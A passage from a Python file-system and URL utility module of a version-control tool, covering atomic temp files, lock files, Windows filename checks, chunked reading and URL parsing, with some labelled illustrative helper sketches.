        if hardlink is None:
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        settopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        settopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        if progress:
            progress.increment()

    return hardlink, num

_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                return _("filename contains '%s', which is invalid "
                         "on Windows") % stringutil.escapestr(c)
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1:]
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t

if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

if safehasattr(time, "perf_counter"):
    timer = time.perf_counter

def makelock(info, pathname):
    """Create a lock file atomically if possible

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
    ld = os.open(pathname, flags)
    os.write(ld, info)
    os.close(ld)

def readlock(pathname):
    try:
        return os.readlink(pathname)
    except OSError as why:
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    fp = posixfile(pathname, 'rb')
    r = fp.read()
    fp.close()
    return r

def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        return os.fstat(fp.fileno())
    except AttributeError:
        return os.stat(fp.name)

# File system features

def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    s1 = os.lstat(path)
    d, b = os.path.split(path)
    b2 = b.upper()
    if b == b2:
        b2 = b.lower()
        if b == b2:
            return True # no evidence against case sensitivity
    p2 = os.path.join(d, b2)
    try:
        s2 = os.lstat(p2)
        if s2 == s1:
            return False
        return True
    except OSError:
        return True

try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False

class _re(object):
    def _checkre2(self):
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape

re = _re()

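# Illustrative sketch (not part of the original module): the re wrapper
# prefers re2 when it is installed and silently falls back to the stdlib
# re module, so callers use a single interface either way. The _demo* name
# is hypothetical.
def _demorecompile():
    pat = re.compile(br'ba[rz]', remod.IGNORECASE)
    assert pat.match(b'BAZ') is not None
    assert re.escape(b'a+b') == b'a\\+b'
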
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patch of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)

def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        f2 = '%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass

def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    return (path.endswith(pycompat.ossep)
            or pycompat.osaltsep and path.endswith(pycompat.osaltsep))

def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative to a simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if needed.'''
    return path.split(pycompat.ossep)

def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents as name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp

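# Illustrative sketch (hypothetical helper, not part of this module):
# rewrite a file through a same-mode temporary copy, swapping the copy
# into place only if the transformation succeeds. readfile/writefile
# are defined later in this module; rename comes from the platform
# layer.
def _demo_rewriteinplace(path, transform):
    temp = mktempcopy(path)
    try:
        writefile(temp, transform(readfile(temp)))
        rename(temp, path)
    except Exception:
        tryunlink(temp)
        raise
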
class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is result of 'os.stat()' if specified 'path'
    exists. Otherwise, it is None. This can avoid preparative
    'exists()' examination on client side of this class.
    """
    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        try:
            stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        stat = os.fstat(fp.fileno())
        return cls(stat)

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
                    self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
        except AttributeError:
            pass
        try:
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime  < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime  < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime  > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime  > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        same time in sec (= S[n-1].ctime), and comparison of timestamp
        is ambiguous.

        The base idea to avoid such ambiguity is "advance mtime 1 sec,
        if timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid such an
        mtime collision being overlooked.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if size of a file isn't changed.
        """
        try:
            return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'. This returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        return not self == other

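# Illustrative sketch (hypothetical helper, not part of this module):
# capture a filestat before an operation and compare afterwards; the
# size/ctime/mtime comparison in __eq__ makes this an exact change
# detector once ambiguity has been avoided.
def _demo_haschanged(path, oldstat):
    # oldstat is a filestat previously captured via filestat.frompath()
    return filestat.frompath(path) != oldstat
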
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        if exctype is not None:
            self.discard()
        else:
            self.close()

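# Illustrative sketch (hypothetical helper, not part of this module):
# the context-manager protocol above makes all-or-nothing rewrites a
# one-liner; on an exception the temporary copy is discarded and the
# original file is left untouched.
def _demo_atomicwrite(path, data):
    with atomictempfile(path, 'wb') as fp:
        fp.write(data)
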
def unlinkpath(f, ignoremissing=False, rmdir=True):
    """unlink and, if rmdir is True, remove the directory if it is empty"""
    if ignoremissing:
        tryunlink(f)
    else:
        unlink(f)
    if rmdir:
        # try removing directories that might now be empty
        try:
            removedirs(os.path.dirname(f))
        except OSError:
            pass

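# Illustrative sketch (hypothetical helper, not part of this module):
# with the new rmdir flag, deleting the last file of a directory can
# leave the now-empty directory in place, instead of pruning it as the
# default rmdir=True does.
def _demo_unlinkkeepdir(f):
    unlinkpath(f, ignoremissing=True, rmdir=False)
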
def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as e:
        if e.errno != errno.ENOENT:
            raise

def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)

def readfile(path):
    with open(path, 'rb') as fp:
        return fp.read()

def writefile(path, text):
    with open(path, 'wb') as fp:
        fp.write(text)

def appendfile(path, text):
    with open(path, 'ab') as fp:
        fp.write(text)

class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        if l is None:
            return ''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                left -= chunkremaining

        return ''.join(buf)

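# Illustrative sketch (hypothetical helper, not part of this module):
# re-chunk an iterator of arbitrarily sized chunks into fixed-size
# blocks; the final block may be short when the input runs dry, and
# filechunkiter() below is a convenient source of input chunks.
def _demo_rechunk(chunks, blocksize=4096):
    buf = chunkbuffer(iter(chunks))
    while True:
        block = buf.read(blocksize)
        if not block:
            break
        yield block
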
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        if limit is None:
            nbytes = size
        else:
            nbytes = min(limit, size)
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s

class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up to
    N bytes from that source file object. Attempts to read past the allowed
    limit are treated as EOF.

    It is assumed that I/O is not performed on the original file object
    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        if not self._left:
            return b''

        if n < 0:
            n = self._left

        data = self._fh.read(min(n, self._left))
        self._left -= len(data)
        assert self._left >= 0

        return data

    def readinto(self, b):
        res = self.read(len(b))
        if res is None:
            return None

        b[0:len(res)] = res
        return len(res)

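# Illustrative sketch (hypothetical framing, not part of this module):
# given a stream of length-prefixed frames, hand the payload out as a
# reader that cannot overrun the frame boundary.
def _demo_framereader(fh):
    import struct
    size = struct.unpack('>I', fh.read(4))[0]
    return cappedreader(fh, size)
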
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def go(count):
        for multiplier, divisor, format in unittable:
            if abs(count) >= divisor * multiplier:
                return format % (count / float(divisor))
        return unittable[-1][2] % count

    return go

def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
      ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
      ...
    ParseError: fromline must be strictly positive
    """
    if toline - fromline < 0:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    return fromline - 1, toline

bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )

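# Illustrative sketch (hypothetical helper, not part of this module):
# unitcountfn() picks the first (multiplier, divisor) row whose
# threshold the magnitude reaches, so precision shrinks as the number
# grows:
#   bytecount(4096)    -> '4.00 KB'
#   bytecount(100000)  -> '97.7 KB'
#   bytecount(1 << 30) -> '1.00 GB'
def _demo_bytecounts():
    return [bytecount(n) for n in (4096, 100000, 1 << 30)]
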
class transformingwriter(object):
    """Writable file wrapper to transform data by function"""

    def __init__(self, fp, encode):
        self._fp = fp
        self._encode = encode

    def close(self):
        self._fp.close()

    def flush(self):
        self._fp.flush()

    def write(self, data):
        return self._fp.write(self._encode(data))

# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    return _eolre.sub('\n', s)

def tocrlf(s):
    return _eolre.sub('\r\n', s)

def _crlfwriter(fp):
    return transformingwriter(fp, tocrlf)

if pycompat.oslinesep == '\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
    nativeeolwriter = _crlfwriter
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
    nativeeolwriter = pycompat.identity

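# Illustrative sketch (hypothetical helper, not part of this module):
# internal text uses LF; wrapping an output file with nativeeolwriter()
# converts to the OS convention on write (a no-op on LF platforms).
def _demo_writenativetext(fp, lines):
    out = nativeeolwriter(fp)
    for line in lines:
        out.write(line + '\n')
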
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp

def iterlines(iterator):
    for chunk in iterator:
        for line in chunk.splitlines():
            yield line

def expandpath(path):
    return os.path.expanduser(os.path.expandvars(path))

def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)

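# Illustrative sketch (hypothetical values, not part of this module):
# with prefix '%' and a plain mapping, each placeholder in the string
# is expanded through the mapping.
def _demo_interpolate():
    mapping = {'user': 'alice', 'repo': 'widgets'}
    # -> 'alice pushed to widgets'
    return interpolate('%', mapping, '%user pushed to %repo')
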
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        pass

    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        raise error.Abort(_("no port number associated with service '%s'")
                          % port)

class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    _safechars = "!~*'()+"
    _safepchars = "/!~*'()+:\\"
    _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = ''
        self._origpath = path

        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and '?' in path:
                path, self.query = path.split('?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith('//'):
                parts = path[2:].split('/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = '/' + path

            if self.host and '@' in self.host:
                self.user, self.host = self.host.rsplit('@', 1)
                if ':' in self.user:
                    self.user, self.passwd = self.user.split(':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (self.host and ':' in self.host and
                not (self.host.startswith('[') and self.host.endswith(']'))):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(':', 1)
                if not self.host:
                    self.host = None

            if (self.host and self.scheme == 'file' and
                self.host not in ('localhost', '127.0.0.1', '[::1]')):
                raise error.Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    @encoding.strmethod
    def __repr__(self):
        attrs = []
        for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                  'query', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
        return '<url %s>' % ', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

